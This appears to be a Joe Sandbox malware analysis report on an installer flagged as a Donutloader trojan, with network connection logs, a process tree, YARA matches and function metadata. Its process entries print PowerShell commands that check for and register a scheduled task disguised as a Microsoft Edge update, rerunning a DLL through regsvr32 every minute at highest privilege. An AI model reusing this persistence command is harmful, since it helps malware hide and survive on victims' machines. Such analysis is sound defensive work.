Jan 6, 2025 07:40:40.993247986 CET	56005	49853	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:42.555932999 CET	56005	49853	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:42.556036949 CET	49853	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:45.561927080 CET	49884	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:45.561955929 CET	49853	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:45.566773891 CET	56004	49884	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:45.566797018 CET	56005	49853	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:45.567162037 CET	49884	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:45.567162037 CET	49884	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:45.571990967 CET	56004	49884	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:47.135374069 CET	56004	49884	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:47.137052059 CET	49884	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:50.139780045 CET	49884	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:50.140096903 CET	49915	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:50.144643068 CET	56004	49884	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:50.144901037 CET	56003	49915	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:50.144978046 CET	49915	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:50.145220041 CET	49915	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:50.149966002 CET	56003	49915	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:51.732172012 CET	56003	49915	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:51.732243061 CET	49915	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:54.750894070 CET	49915	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:54.751167059 CET	49947	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:54.755759954 CET	56003	49915	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:54.755990982 CET	56003	49947	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:54.756063938 CET	49947	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:54.756257057 CET	49947	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:54.761039019 CET	56003	49947	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:56.304416895 CET	56003	49947	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:56.306467056 CET	49947	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:59.328006029 CET	49947	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:59.328383923 CET	49978	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:59.332842112 CET	56003	49947	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:59.333422899 CET	56003	49978	38.49.56.2	192.168.2.5
Jan 6, 2025 07:40:59.333503962 CET	49978	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:59.333909035 CET	49978	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:40:59.339107037 CET	56003	49978	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:00.920564890 CET	56003	49978	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:00.923000097 CET	49978	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:03.944845915 CET	49978	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:03.945486069 CET	49986	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:03.949743032 CET	56003	49978	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:03.950270891 CET	56005	49986	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:03.950330019 CET	49986	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:03.953104019 CET	49986	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:03.957923889 CET	56005	49986	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:05.529438972 CET	56005	49986	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:05.530972958 CET	49986	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:08.545628071 CET	49986	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:08.545928955 CET	49987	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:08.550443888 CET	56005	49986	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:08.550755024 CET	56003	49987	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:08.550825119 CET	49987	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:08.551183939 CET	49987	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:08.556005955 CET	56003	49987	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:10.153489113 CET	56003	49987	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:10.153563023 CET	49987	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:13.171339989 CET	49987	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:13.171648979 CET	49988	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:13.176122904 CET	56003	49987	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:13.176486015 CET	56004	49988	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:13.176568031 CET	49988	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:13.176826000 CET	49988	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:13.181601048 CET	56004	49988	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:14.762873888 CET	56004	49988	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:14.762939930 CET	49988	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:17.780132055 CET	49988	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:17.780425072 CET	49990	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:17.784904003 CET	56004	49988	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:17.785238028 CET	56004	49990	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:17.785315990 CET	49990	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:17.785598993 CET	49990	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:17.790460110 CET	56004	49990	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:19.352812052 CET	56004	49990	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:19.352901936 CET	49990	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:22.061351061 CET	49990	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:22.061675072 CET	49991	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:22.066191912 CET	56004	49990	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:22.066508055 CET	56003	49991	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:22.066607952 CET	49991	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:22.066981077 CET	49991	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:22.071872950 CET	56003	49991	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:23.656661034 CET	56003	49991	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:23.656737089 CET	49991	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:26.092159033 CET	49991	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:26.092469931 CET	49992	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:26.096982956 CET	56003	49991	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:26.097265005 CET	56003	49992	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:26.097376108 CET	49992	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:26.097629070 CET	49992	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:26.102464914 CET	56003	49992	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:27.665407896 CET	56003	49992	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:27.665467978 CET	49992	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:29.861370087 CET	49992	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:29.861675978 CET	49993	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:29.866158009 CET	56003	49992	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:29.866487980 CET	56005	49993	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:29.866563082 CET	49993	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:29.866835117 CET	49993	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:29.871588945 CET	56005	49993	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:31.451705933 CET	56005	49993	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:31.451843977 CET	49993	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:33.436389923 CET	49993	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:33.436698914 CET	49994	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:33.441231966 CET	56005	49993	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:33.441485882 CET	56004	49994	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:33.441580057 CET	49994	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:33.441836119 CET	49994	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:33.446592093 CET	56004	49994	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:35.028593063 CET	56004	49994	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:35.030992985 CET	49994	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:36.810775995 CET	49994	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:36.811084032 CET	49995	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:36.815578938 CET	56004	49994	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:36.815936089 CET	56004	49995	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:36.816024065 CET	49995	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:36.816303968 CET	49995	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:36.821110010 CET	56004	49995	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:38.384536982 CET	56004	49995	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:38.384608030 CET	49995	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:39.983191967 CET	49995	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:39.983505964 CET	49996	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:39.988022089 CET	56004	49995	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:39.988334894 CET	56004	49996	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:39.988409996 CET	49996	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:39.988682032 CET	49996	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:39.993459940 CET	56004	49996	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:41.577686071 CET	56004	49996	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:41.577775002 CET	49996	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:43.030416012 CET	49996	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:43.031359911 CET	49997	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:43.035296917 CET	56004	49996	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:43.036220074 CET	56003	49997	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:43.036288977 CET	49997	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:43.036597967 CET	49997	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:43.041336060 CET	56003	49997	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:44.605326891 CET	56003	49997	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:44.605422020 CET	49997	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:45.904783964 CET	49997	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:45.905134916 CET	49998	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:45.909594059 CET	56003	49997	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:45.909904003 CET	56005	49998	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:45.909976959 CET	49998	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:45.910274029 CET	49998	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:45.915040970 CET	56005	49998	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:47.480140924 CET	56005	49998	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:47.480206013 CET	49998	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:48.654660940 CET	49998	56005	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:48.654943943 CET	49999	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:48.659492970 CET	56005	49998	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:48.660108089 CET	56004	49999	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:48.660207987 CET	49999	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:48.660449028 CET	49999	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:48.665184021 CET	56004	49999	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:50.232240915 CET	56004	49999	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:50.232428074 CET	49999	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:51.295789957 CET	49999	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:51.296108961 CET	50000	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:51.300604105 CET	56004	49999	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:51.300915956 CET	56004	50000	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:51.300995111 CET	50000	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:51.301249981 CET	50000	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:51.306010008 CET	56004	50000	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:52.886941910 CET	56004	50000	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:52.887025118 CET	50000	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:53.842081070 CET	50000	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:53.842356920 CET	50001	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:53.847908020 CET	56004	50000	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:53.848026991 CET	56004	50001	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:53.848107100 CET	50001	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:53.848351002 CET	50001	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:53.853156090 CET	56004	50001	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:55.416244030 CET	56004	50001	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:55.416310072 CET	50001	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:56.280378103 CET	50001	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:56.280687094 CET	50002	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:56.285213947 CET	56004	50001	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:56.285525084 CET	56003	50002	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:56.285598040 CET	50002	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:56.285989046 CET	50002	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:56.290761948 CET	56003	50002	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:57.872776031 CET	56003	50002	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:57.872858047 CET	50002	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:58.643579006 CET	50002	56003	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:58.643868923 CET	50003	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:58.648546934 CET	56003	50002	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:58.648663044 CET	56004	50003	38.49.56.2	192.168.2.5
Jan 6, 2025 07:41:58.648749113 CET	50003	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:58.648988008 CET	50003	56004	192.168.2.5	38.49.56.2
Jan 6, 2025 07:41:58.653776884 CET	56004	50003	38.49.56.2	192.168.2.5
Jan 6, 2025 07:42:00.233609915 CET	56004	50003	38.49.56.2	192.168.2.5
Jan 6, 2025 07:42:00.233680964 CET	50003	56004	192.168.2.5	38.49.56.2

Target ID:	0
Start time:	01:39:54
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\h40thEqmz6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\h40thEqmz6.exe"
Imagebase:	0x400000
File size:	830'528 bytes
MD5 hash:	E3AE2DC9B8B0582A266871B52E85C36F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:39:54
Start date:	06/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp" /SL5="$1041E,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe"
Imagebase:	0x400000
File size:	1'160'704 bytes
MD5 hash:	8FDC58C7D4C59472615682D6DEA9D190
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 4%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:39:54
Start date:	06/01/2025
Path:	C:\Users\user\Desktop\h40thEqmz6.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT
Imagebase:	0x400000
File size:	830'528 bytes
MD5 hash:	E3AE2DC9B8B0582A266871B52E85C36F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:39:54
Start date:	06/01/2025
Path:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp" /SL5="$2042C,450685,141312,C:\Users\user\Desktop\h40thEqmz6.exe" /VERYSILENT
Imagebase:	0x400000
File size:	1'160'704 bytes
MD5 hash:	8FDC58C7D4C59472615682D6DEA9D190
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 4%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:39:55
Start date:	06/01/2025
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	"regsvr32.exe" /s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll
Imagebase:	0x740000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:39:55
Start date:	06/01/2025
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	/s /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll
Imagebase:	0x7ff64f590000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000006.00000002.3245140417.00000000025C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.3245193500.00000000026E0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000006.00000002.3244688637.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	01:39:55
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll' }) { exit 0 } else { exit 1 }"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:39:55
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:40:06
Start date:	06/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	01:40:06
Start date:	06/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:40:09
Start date:	06/01/2025
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.EXE /S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll
Imagebase:	0x7ff64f590000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:40:18
Start date:	06/01/2025
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"regsvr32" /i:360 /s C:\Users\user\AppData\Roaming\Setup_Coat.dll
Imagebase:	0x7ff64f590000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	4%
Signature Coverage:	64.3%
Total number of Nodes:	1325
Total number of Limit Nodes:	46

Executed Functions

Function 00007FF8A9301E80 Relevance: 199.5, APIs: 104, Strings: 8, Instructions: 3546memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9302533
HeapFree.KERNEL32 ref: 00007FF8A930254E
HeapFree.KERNEL32 ref: 00007FF8A9302611

Strings

not yet implemented, xrefs: 00007FF8A93077AE
Could not read enough bytesFromUtf8Errorbyteserrorinvalid seek to a negative or overflowing position, xrefs: 00007FF8A930701E, 00007FF8A9307043
Support for multi-disk files is not implemented, xrefs: 00007FF8A930792A
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF8A93071F3
Could not find central directory endInvalid digital signature header, xrefs: 00007FF8A930487C
cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs, xrefs: 00007FF8A93077D7, 00007FF8A9307961
a Display implementation returned an error unexpectedly, xrefs: 00007FF8A9307808
, xrefs: 00007FF8A9303497

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: $Could not find central directory endInvalid digital signature header$Could not read enough bytesFromUtf8Errorbyteserrorinvalid seek to a negative or overflowing position$Support for multi-disk files is not implemented$a Display implementation returned an error unexpectedly$called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs$not yet implemented
API String ID: 3298025750-2485186637
Opcode ID: c4b90692a326a39c1ee03051f65a85d70b65fc544d6c06a9caec84f7dcd05278
Instruction ID: 86786f74de1aff722fc68617f8df7eaaa882c9c31f451b25a92716ed0dd69b28
Opcode Fuzzy Hash: c4b90692a326a39c1ee03051f65a85d70b65fc544d6c06a9caec84f7dcd05278
Instruction Fuzzy Hash: 05832722A0EBC291EA718F55E4443BEA3B0FB88784F406176DA8D87B99DF7DD544CB40

Function 00007FF8A9340230 Relevance: 156.5, APIs: 83, Strings: 5, Instructions: 2508memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A934032C
HeapFree.KERNEL32 ref: 00007FF8A9340414
HeapFree.KERNEL32 ref: 00007FF8A9340532
HeapFree.KERNEL32 ref: 00007FF8A934055C
GetEnvironmentStringsW.KERNEL32 ref: 00007FF8A9340603

Strings

\?\\, xrefs: 00007FF8A934124A
]?\\, xrefs: 00007FF8A9341252
PATHlibrary\std\src\sys_common\process.rs, xrefs: 00007FF8A934279B
.exeprogram not found, xrefs: 00007FF8A93413C4
assertion failed: self.height > 0, xrefs: 00007FF8A93432F7

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$EnvironmentStrings
String ID: .exeprogram not found$PATHlibrary\std\src\sys_common\process.rs$\?\\$]?\\$assertion failed: self.height > 0
API String ID: 2767186067-2173948767
Opcode ID: c17e2ad06564bcccafbd6c05015ad6f98d51abece7a6af01462acf521588f66e
